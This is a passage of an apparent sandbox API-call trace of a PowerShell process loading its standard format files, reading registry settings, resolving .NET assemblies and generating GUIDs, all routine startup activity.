	[0793.701] ReadFile (in: hFile=0x2fc, lpBuffer=0x3433468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3433468*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.702] ReadFile (in: hFile=0x2fc, lpBuffer=0x3433468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3433468*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.702] ReadFile (in: hFile=0x2fc, lpBuffer=0x3433468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3433468*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.703] ReadFile (in: hFile=0x2fc, lpBuffer=0x3433468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3433468*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.704] ReadFile (in: hFile=0x2fc, lpBuffer=0x3433468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3433468*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0793.706] ReadFile (in: hFile=0x2fc, lpBuffer=0x3433468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3433468*, lpNumberOfBytesRead=0x14d178*=0xfb2, lpOverlapped=0x0) returned 1
	[0793.706] ReadFile (in: hFile=0x2fc, lpBuffer=0x3432b82, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3432b82*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0793.706] ReadFile (in: hFile=0x2fc, lpBuffer=0x3433468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3433468*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0793.706] CloseHandle (hObject=0x2fc) returned 1
	[0793.706] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0793.706] SetErrorMode (uMode=0x1) returned 0x1
	[0793.706] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0793.707] SetErrorMode (uMode=0x1) returned 0x1
	[0793.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0793.707] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2fc) returned 0x0
	[0793.707] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0793.707] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3aa10
	[0793.707] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3aa10, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0793.707] CoTaskMemFree (pv=0x1ba3aa10) 
	[0793.707] RegCloseKey (hKey=0x2fc) returned 0x0
	[0793.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0793.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0793.710] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x549bf610, Data2=0x573f, Data3=0x4e81, Data4=([0]=0xa5, [1]=0xee, [2]=0x6, [3]=0xa3, [4]=0xdb, [5]=0x70, [6]=0x90, [7]=0xd0))) returned 0x0
	[0794.859] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xaece744e, Data2=0xab22, Data3=0x4251, Data4=([0]=0x87, [1]=0xa7, [2]=0x78, [3]=0x2f, [4]=0xbc, [5]=0x94, [6]=0x56, [7]=0xa5))) returned 0x0
	[0794.860] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x8aa821b3, Data2=0x29e5, Data3=0x4bf7, Data4=([0]=0xab, [1]=0xef, [2]=0xc8, [3]=0xde, [4]=0x7e, [5]=0x27, [6]=0xd, [7]=0xd4))) returned 0x0
	[0794.861] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x60c3ffb4, Data2=0x78e9, Data3=0x44b1, Data4=([0]=0x8b, [1]=0xec, [2]=0x15, [3]=0xd, [4]=0x29, [5]=0xcf, [6]=0x79, [7]=0x29))) returned 0x0
	[0794.862] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xc4b7db26, Data2=0xb7c1, Data3=0x46ec, Data4=([0]=0x95, [1]=0x8b, [2]=0xeb, [3]=0xd2, [4]=0xbe, [5]=0x15, [6]=0x34, [7]=0x9a))) returned 0x0
	[0794.863] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x6a3e84d3, Data2=0x10b, Data3=0x4806, Data4=([0]=0x8d, [1]=0x17, [2]=0x6c, [3]=0xc3, [4]=0x75, [5]=0xd6, [6]=0x48, [7]=0x13))) returned 0x0
	[0794.863] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0794.864] SetErrorMode (uMode=0x1) returned 0x1
	[0794.864] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0794.864] GetFileType (hFile=0x2fc) returned 0x1
	[0794.864] SetErrorMode (uMode=0x1) returned 0x1
	[0794.864] GetFileType (hFile=0x2fc) returned 0x1
	[0794.864] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347f1c8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0794.866] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347f1c8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0794.867] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347f1c8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0794.870] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347f1c8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0794.872] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347f1c8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0794.872] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347f1c8*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0794.872] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347f1c8*, lpNumberOfBytesRead=0x14d178*=0xaca, lpOverlapped=0x0) returned 1
	[0794.872] ReadFile (in: hFile=0x2fc, lpBuffer=0x347e7fa, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347e7fa*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0794.872] ReadFile (in: hFile=0x2fc, lpBuffer=0x347f1c8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x347f1c8*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0794.873] CloseHandle (hObject=0x2fc) returned 1
	[0794.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0794.873] SetErrorMode (uMode=0x1) returned 0x1
	[0794.873] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14d120 | out: lpFileInformation=0x14d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0794.873] SetErrorMode (uMode=0x1) returned 0x1
	[0794.873] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0794.874] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2fc) returned 0x0
	[0794.874] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0794.874] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3aa10
	[0794.874] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3aa10, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0794.874] CoTaskMemFree (pv=0x1ba3aa10) 
	[0794.874] RegCloseKey (hKey=0x2fc) returned 0x0
	[0794.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0794.874] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0794.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0794.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0794.896] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0794.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0797.069] VirtualQuery (in: lpAddress=0x14bca0, lpBuffer=0x14cb60, dwLength=0x30 | out: lpBuffer=0x14cb60*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0798.019] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x8c734142, Data2=0xe747, Data3=0x48df, Data4=([0]=0x92, [1]=0x9, [2]=0x84, [3]=0x7b, [4]=0x32, [5]=0x6d, [6]=0x62, [7]=0xf8))) returned 0x0
	[0798.023] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xf36e7424, Data2=0x6312, Data3=0x47cb, Data4=([0]=0xb3, [1]=0x2e, [2]=0xad, [3]=0x2f, [4]=0xba, [5]=0x94, [6]=0x82, [7]=0x9e))) returned 0x0
	[0798.024] VirtualQuery (in: lpAddress=0x14be50, lpBuffer=0x14cd10, dwLength=0x30 | out: lpBuffer=0x14cd10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0798.024] VirtualQuery (in: lpAddress=0x14be50, lpBuffer=0x14cd10, dwLength=0x30 | out: lpBuffer=0x14cd10*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0798.025] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x7a21cf92, Data2=0xcfb4, Data3=0x47b0, Data4=([0]=0x8c, [1]=0x51, [2]=0x9a, [3]=0x7f, [4]=0x2c, [5]=0x75, [6]=0x83, [7]=0xfd))) returned 0x0
	[0798.028] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x6ca978b7, Data2=0x6fe3, Data3=0x4cbb, Data4=([0]=0xab, [1]=0x0, [2]=0xa, [3]=0x9c, [4]=0x89, [5]=0xf, [6]=0xc6, [7]=0xb0))) returned 0x0
	[0798.028] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x6e1e0b2, Data2=0x19e9, Data3=0x4643, Data4=([0]=0xb7, [1]=0xff, [2]=0x74, [3]=0x79, [4]=0x93, [5]=0x6, [6]=0x57, [7]=0x56))) returned 0x0
	[0798.029] VirtualQuery (in: lpAddress=0x14b710, lpBuffer=0x14c5d0, dwLength=0x30 | out: lpBuffer=0x14c5d0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0798.030] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xea4e6b25, Data2=0x5651, Data3=0x496b, Data4=([0]=0xaf, [1]=0xd9, [2]=0x9e, [3]=0xa8, [4]=0xb, [5]=0xb, [6]=0xcc, [7]=0xa9))) returned 0x0
	[0798.030] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x2703900c, Data2=0x281a, Data3=0x4e0b, Data4=([0]=0xb2, [1]=0xaa, [2]=0xf3, [3]=0xd6, [4]=0x4c, [5]=0xf5, [6]=0x38, [7]=0x1b))) returned 0x0
	[0798.030] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f4
	[0798.031] GetFileType (hFile=0x2f4) returned 0x1
	[0798.031] SetErrorMode (uMode=0x1) returned 0x1
	[0798.031] GetFileType (hFile=0x2f4) returned 0x1
	[0798.031] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.032] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.032] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.032] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.032] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.033] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.033] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.033] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.035] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.035] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.036] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.036] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.037] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.037] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.037] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.038] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.041] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x1000, lpOverlapped=0x0) returned 1
	[0798.042] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0xbce, lpOverlapped=0x0) returned 1
	[0798.042] ReadFile (in: hFile=0x2f4, lpBuffer=0x3369906, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x3369906*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0798.042] ReadFile (in: hFile=0x2f4, lpBuffer=0x336a1d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14d178, lpOverlapped=0x0 | out: lpBuffer=0x336a1d0*, lpNumberOfBytesRead=0x14d178*=0x0, lpOverlapped=0x0) returned 1
	[0798.042] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14d208 | out: phkResult=0x14d208*=0x2f4) returned 0x0
	[0798.043] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d18c, lpData=0x0, lpcbData=0x14d188*=0x0 | out: lpType=0x14d18c*=0x1, lpData=0x0, lpcbData=0x14d188*=0x56) returned 0x0
	[0798.043] CoTaskMemAlloc (cb=0x5a) returned 0x1ba3a1c0
	[0798.043] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14d15c, lpData=0x1ba3a1c0, lpcbData=0x14d158*=0x56 | out: lpType=0x14d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14d158*=0x56) returned 0x0
	[0798.043] CoTaskMemFree (pv=0x1ba3a1c0) 
	[0798.043] RegCloseKey (hKey=0x2f4) returned 0x0
	[0798.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0798.043] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0798.044] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xb889e682, Data2=0x7605, Data3=0x4904, Data4=([0]=0xb2, [1]=0xb9, [2]=0x30, [3]=0x20, [4]=0x81, [5]=0x54, [6]=0x98, [7]=0x50))) returned 0x0
	[0798.045] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x88c786fc, Data2=0xa9a0, Data3=0x43d3, Data4=([0]=0xac, [1]=0x27, [2]=0x11, [3]=0xb8, [4]=0x26, [5]=0xee, [6]=0x9e, [7]=0x83))) returned 0x0
	[0798.045] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xcbb51c7c, Data2=0xb8ad, Data3=0x4e27, Data4=([0]=0x89, [1]=0x1b, [2]=0x22, [3]=0x9a, [4]=0xee, [5]=0x43, [6]=0xe6, [7]=0x58))) returned 0x0
	[0798.045] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0x2516e0b0, Data2=0x9a12, Data3=0x42a9, Data4=([0]=0xa8, [1]=0x47, [2]=0xd, [3]=0xeb, [4]=0x35, [5]=0xc6, [6]=0x37, [7]=0x6a))) returned 0x0
	[0798.045] CoCreateGuid (in: pguid=0x14d430 | out: pguid=0x14d430*(Data1=0xb308a9a8, Data2=0x5fc, Data3=0x4727, Data4=([0]=0x9e, [1]=0xfa, [2]=0xe6, [3]=0xc, [4]=0x8b, [5]=0xda, [6]=0xe5, [7]=0x2))) returned 0x0
